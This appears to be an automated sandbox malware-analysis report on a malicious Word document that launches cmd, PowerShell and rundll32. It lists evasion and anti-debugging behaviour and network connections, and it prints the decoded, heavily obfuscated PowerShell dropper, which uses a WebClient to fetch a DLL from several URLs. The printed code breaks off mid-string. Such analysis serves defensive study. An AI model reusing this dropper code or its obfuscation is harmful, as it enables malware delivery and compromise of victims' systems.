Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2095369580.0000000000367000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind 7_2_10002460
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10007528
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_10013BFB
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F6AB2 mov eax, dword ptr fs:[00000030h] 7_2_001F6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_007176B2 mov eax, dword ptr fs:[00000030h] 8_2_007176B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00196AB2 mov eax, dword ptr fs:[00000030h] 9_2_00196AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001A6AB2 mov eax, dword ptr fs:[00000030h] 10_2_001A6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002676B2 mov eax, dword ptr fs:[00000030h] 11_2_002676B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002276B2 mov eax, dword ptr fs:[00000030h] 13_2_002276B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F76B2 mov eax, dword ptr fs:[00000030h] 14_2_001F76B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E6AB2 mov eax, dword ptr fs:[00000030h] 15_2_001E6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_001E6AB2 mov eax, dword ptr fs:[00000030h] 16_2_001E6AB2
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 7_2_10004500
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10007528
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10009F26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10006F64

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 202.187.222.40 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 184.66.18.83 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 167.71.148.58 187
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J Jump to 